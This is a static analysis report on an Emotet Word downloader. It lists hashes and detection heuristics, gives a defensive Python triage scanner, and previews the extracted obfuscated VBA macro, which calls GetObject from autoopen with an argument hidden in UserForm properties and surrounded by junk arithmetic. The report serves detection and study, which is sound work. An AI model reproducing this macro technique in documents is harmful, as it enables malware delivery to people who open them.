Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9a8d362fc959cf40…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 176.6 KB
Created: 2019-03-29 11:51:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: b982539a10e2bb1ca7f2aa9729376ab4
SHA-1: 1076ab5103d747b6a61586c0c7b0660d7f71b71f
SHA-256: 9a8d362fc959cf40b56da65e72e1dd1a8a891fe93215a2f97fc8b4c51fc62ec1
Risk score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

ClamAV flags the file with the signature Doc.Downloader.Emotet-6916021-0. Static analysis recovered a VBA project whose entry point is Sub autoopen(), which does nothing but call the function m1CQQA. That function runs under On Error Resume Next and passes to GetObject a string assembled from UserForm control properties (the .Text and .ControlTipText of a control on form acU_wXDB plus a property of form FAGXUAQA). The moniker string therefore lives in the form streams, not in the module source, and is not visible in the extracted macro text. The rest of the code is padding: comparisons between never-assigned variables (and the tautology If 44628 = 44628) guarding arithmetic over large constants with Log, Atn, Tan, Sin and Sgn whose results are never read; any runtime error in that padding is swallowed by On Error Resume Next and execution proceeds to the GetObject call. Building the GetObject argument from form properties is consistent with Emotet's document downloader stage, which uses it to launch a second-stage payload; recovering the actual command requires the UserForm stream strings (olevba reports these separately from the module source) or dynamic analysis.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6916021-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6916021-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
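The findings that carry this verdict, the auto-exec entry point (OLE_VBA_AUTOOPEN) and the GetObject call (OLE_VBA_GETOBJ) whose argument is built from UserForm properties, can be reproduced on decoded VBA source with a short scanner. The following is an added example written for this page; it is not code from the analysis platform or from oletools, and it works on decoded source only (it does not cover the compiled p-code heuristic). SAMPLE_VBA is a constructed excerpt modelled on the extracted macros.bas, not the full artifact. The scanner follows call references from the auto-exec procedure to the execution primitives it reaches, records whether each primitive's argument is a string literal or is assembled from form-control properties, and scores the junk-arithmetic padding. The labels EXEC_ARG_FROM_FORM_CONTROLS and VBA_JUNK_PADDING are hypothetical names chosen here, not identifiers from the report; the other two match the report's heuristic IDs.

```python
"""Triage decoded VBA source for auto-exec entry points, reachable execution
primitives and junk padding. Added example; not the report's tooling."""
import json
import re

# Constructed excerpt modelled on the extracted macros.bas (not the full artifact).
SAMPLE_VBA = '''Attribute VB_Name = "YZQAAD"
Function noAQcUCw()
   If UAoDAXQX = vADA4c Then
Set wADwD4Zo = iAZAAoXZ
oXABxAC = tAGAAD4 - 505055942 - 168268245 + Log(680083444 - Atn(zABQcUAZ / FQAAQZZw + jAAQcDA / Tan(178843477))) * (722570223 + Sgn(375321897 / Sin(vAAAD1xC)))
Set wCAAXA = zCCAAQ
End If
End Function
Sub autoopen()
m1CQQA
End Sub
Function m1CQQA()
On Error Resume Next
   If KA4GwZAx = rAXk_AAo Then
Set j41CGC = J4BZX_
MBBQoBZc = vcCAAUB - 368973020 - 110878762 + Log(596488084 - Atn(z1AAB_w / kAGDC1G + G1BXxo / Tan(251480417))) * (522235078 + Sgn(862993557 / Sin(qDAABo1A)))
End If
Set d1wDDA = GetObject(acU_wXDB.UGD1AkUA.Text + FAGXUAQA.VcCAA_AA + acU_wXDB.UGD1AkUA.ControlTipText)
If 44628 = 44628 Then
   If j4AGGA = EA_BAxXA Then
Set AAxwAAw = ZA4AAADA
End If
End If
End Function
'''

# One Sub/Function from its header to the matching End Sub/End Function.
PROC_RE = re.compile(r'^[ \t]*(?:Public\s+|Private\s+)?(Sub|Function)\s+(\w+)\s*\(.*?^[ \t]*End\s+\1\b',
                     re.I | re.M | re.S)
AUTOEXEC = {'autoopen', 'autoexec', 'autonew', 'autoclose', 'auto_open', 'auto_close',
            'document_open', 'document_close', 'workbook_open', 'workbook_close'}
EXEC_CALLS = {'getobject', 'createobject', 'shell', 'shellexecute', 'run'}
CALL_RE = re.compile(r'\b(\w+)\s*\(')
# Form.Control.Property references, the pattern used to hide the GetObject moniker.
FORM_PROP_RE = re.compile(r'\b\w+\.\w+\.(?:Text|ControlTipText|Caption|Tag|Value)\b')
JUNK_LINE_RES = (
    re.compile(r'\b(?:Log|Atn|Tan|Sin|Cos|Sgn)\s*\(', re.I),       # arithmetic padding
    re.compile(r'^\s*Set\s+\w+\s*=\s*\w+\s*$', re.I),              # Set x = y with no call
    re.compile(r'^\s*If\s+\w+\s*=\s*\w+\s+Then\s*$', re.I),        # compare of bare names/literals
)


def procedures(src):
    """Map lower-cased procedure name -> its full text (header through End)."""
    return {m.group(2).lower(): m.group(0) for m in PROC_RE.finditer(src)}


def call_argument(text, open_paren):
    """Text inside the balanced parentheses that open at index open_paren."""
    depth = 0
    for i in range(open_paren, len(text)):
        if text[i] == '(':
            depth += 1
        elif text[i] == ')':
            depth -= 1
            if depth == 0:
                return text[open_paren + 1:i]
    return text[open_paren + 1:]


def exec_calls(body):
    """Execution primitives called in a procedure body, with argument shape."""
    found = []
    for m in CALL_RE.finditer(body):
        if m.group(1).lower() in EXEC_CALLS:
            arg = call_argument(body, m.end() - 1).strip()
            found.append({'call': m.group(1), 'argument': arg,
                          'literal': arg.startswith('"'),
                          'from_form_controls': bool(FORM_PROP_RE.search(arg))})
    return found


def reachable(procs, start):
    """Procedures reachable from start by following bare identifier references."""
    seen, stack = set(), [start]
    while stack:
        name = stack.pop()
        if name in seen or name not in procs:
            continue
        seen.add(name)
        stack.extend(i.lower() for i in re.findall(r'\b\w+\b', procs[name]) if i.lower() in procs)
    return seen


def junk_ratio(src):
    """Share of statement lines that are padding rather than real logic."""
    lines = [l for l in src.splitlines() if l.strip() and not l.lstrip().startswith('Attribute')]
    junk = sum(1 for l in lines if any(r.search(l) for r in JUNK_LINE_RES))
    return junk / len(lines) if lines else 0.0


def triage(src):
    procs = procedures(src)
    entry = sorted(n for n in procs if n in AUTOEXEC)
    calls = []
    for start in entry:
        for proc in sorted(reachable(procs, start)):
            for c in exec_calls(procs[proc]):
                calls.append(dict(c, in_procedure=proc, entry=start))
    findings = []
    if entry:
        findings.append('OLE_VBA_AUTOOPEN')
    if any(c['call'].lower() == 'getobject' for c in calls):
        findings.append('OLE_VBA_GETOBJ')
    if any(c['from_form_controls'] for c in calls):
        findings.append('EXEC_ARG_FROM_FORM_CONTROLS')   # hypothetical label
    ratio = junk_ratio(src)
    if ratio > 0.3:
        findings.append('VBA_JUNK_PADDING')              # hypothetical label
    return {'entry_points': entry, 'exec_calls': calls, 'junk_ratio': ratio, 'findings': findings}


if __name__ == '__main__':
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Because the GetObject argument is not a literal, the scanner can report the shape of the call (reached from autoopen via m1CQQA, argument concatenated from form properties) but not the moniker itself; that still requires the UserForm stream strings or execution in a sandbox.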

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24415 bytes
SHA-256: b087b35146312bd57391438db15bf37e0bd0ff842e6287c48ce8c4a880452b6c
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "QAXAUAQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "acU_wXDB"
Attribute VB_Base = "0{4FCED8B7-30FC-4ED9-A1E7-1F401687FD9E}{78F889BA-9E36-47E5-A472-6210A96358E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "FAGXUAQA"
Attribute VB_Base = "0{3DE04CE5-B0B0-4846-9C33-5EE74FC586C2}{858E5775-70DD-4A6D-B2E8-2266E10C1C0B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "YZQAAD"
Function noAQcUCw()
   If UAoDAXQX = vADA4c Then
Set wADwD4Zo = iAZAAoXZ
oXABxAC = tAGAAD4 - 505055942 - 168268245 + Log(680083444 - Atn(zABQcUAZ / FQAAQZZw + jAAQcDA / Tan(178843477))) * (722570223 + Sgn(375321897 / Sin(vAAAD1xC)))
Set wCAAXA = zCCAAQ
End If
   If qZccBA = VBAQXA_k Then
Set r4DUxDw = fDUxAABC
kAUAwD = PwxA4A - 718307864 - 952430164 + Log(455767000 - Atn(ZAAkXk / cAQ4UXcU + XBAQCAw / Tan(924078672))) * (298640277 + Sgn(738034148 / Sin(sQQBQw)))
Set KAQGCX = RkAAAQc
End If
End Function
Function zAAAAUAw()
   If hAGUUQA = MAXUAwDx Then
Set wQUAoxGZ = JGUQBA
wAw4AA = FZAQAUAB - 284219250 - 817125947 + Log(257052538 - Atn(kU1AwBBA / PQAAAG + YowAX_ / Tan(246632403))) * (840841142 + Sgn(793654468 / Sin(YADXAAQC)))
Set RAwGDAc = fAAQQ4B
End If
   If Q1BUACA = H4oDBX Then
Set uX4BoDA = jCwC1xUQ
rAZBAAA = jAD_AcAo - 555087613 - 23826184 + Log(431821409 - Atn(QA1AAAB / pAU_wUA + jxA_AQ_ / Tan(973340830))) * (953480254 + Sgn(478078400 / Sin(bAZ1xQ1k)))
Set YAADQAQQ = tZACkB
End If
   If j4ADACQA = RA1XAAB Then
Set EkZwA4 = LAAA_C
WQDDDAA = rDxDAAQ - 571512356 - 510268391 + Log(206464688 - Atn(VAAUUB / WocxB4 + OAD_AAc / Tan(256286743))) * (29559814 + Sgn(848300119 / Sin(v_CAUZx1)))
Set SXAACCD = WQA1ABkG
End If
End Function
Sub autoopen()
m1CQQA
End Sub
Function m1CQQA()
On Error Resume Next
   If KA4GwZAx = rAXk_AAo Then
Set j41CGC = J4BZX_
MBBQoBZc = vcCAAUB - 368973020 - 110878762 + Log(596488084 - Atn(z1AAB_w / kAGDC1G + G1BXxo / Tan(251480417))) * (522235078 + Sgn(862993557 / Sin(qDAABo1A)))
Set BAAoXXAB = sAA_AA
End If
   If FXDQCAx = zAxcX4cA Then
Set NCQGAUcQ = sAD44AA
nAABADAG = dUQAcX - 470963566 - 560500095 + Log(512986172 - Atn(zQAUCk / TAQcUDU + KABUBA / Tan(27841163))) * (919408799 + Sgn(99276263 / Sin(VkUQQQ)))
Set f_UwGAA = mAwAcD
End If
Set d1wDDA = GetObject(acU_wXDB.UGD1AkUA.Text + FAGXUAQA.VcCAA_AA + acU_wXDB.UGD1AkUA.ControlTipText)
   If lAkAAkBk = q_1_4Z Then
Set NGAZwD = MAABBD
VAkAAAB = IxAAA4AA - 712660577 - 448959432 + Log(325920443 - Atn(Ax4woU / fAwAA1 + Y4BU4DD / Tan(424755303))) * (775049975 + Sgn(433238418 / Sin(OBAAAX)))
Set rZAAAU = wBA1UA
End If
   If wcxZU1 = mBZBAQ4 Then
Set UUAQAX4 = tcAQADAA
iDAGQAD = IUQZ1A - 985433666 - 974070461 + Log(272105171 - Atn(qADAUA / cUADDwCB + aDAZ4A / Tan(592446402))) * (361723672 + Sgn(462940403 / Sin(CkQUZQA)))
Set OCDUA4k = OABUCQX
End If
If 44628 = 44628 Then
   If j4AGGA = EA_BAxXA Then
Set AAxwAAw = ZA4AAADA
GBUwAA = SADAGDA - 536367155 - 787462622 + Log(197038824 - Atn(q_AAAGZX / pCkDoQ4C + cooAUA / Tan(595061147))) * (498456042 + Sgn(721229599 / Sin(IGkAGA)))
Set DBAAQ4 = dXAABAA
End If
   If jUAGAQx = HAAcw4x Then
Set cZADA4AD = j_DQAC
BxAZoo_A = IGAkDA_B - 261462350 - 616511046 + Log(655718205 - Atn(IxQBAQBB / fxckx4 + FAwAk_Z / Tan(363086683))) * (25956024 + Sgn(321724842 / Sin(PA_AAZD1)))
Set PDkAAkkw = sxBBQAoA
End If
   If CQAZCx = moxkDBx_ Then
Set sDxAAAAX = ZQZAXAww
iU4cUoC = cAGQCA - 845238247 - 325819389 + Log(703240359 - Atn(DAUAAcU / fAAokk__ + JDwkAQA / Tan(223797623))) * (5233956
... (truncated)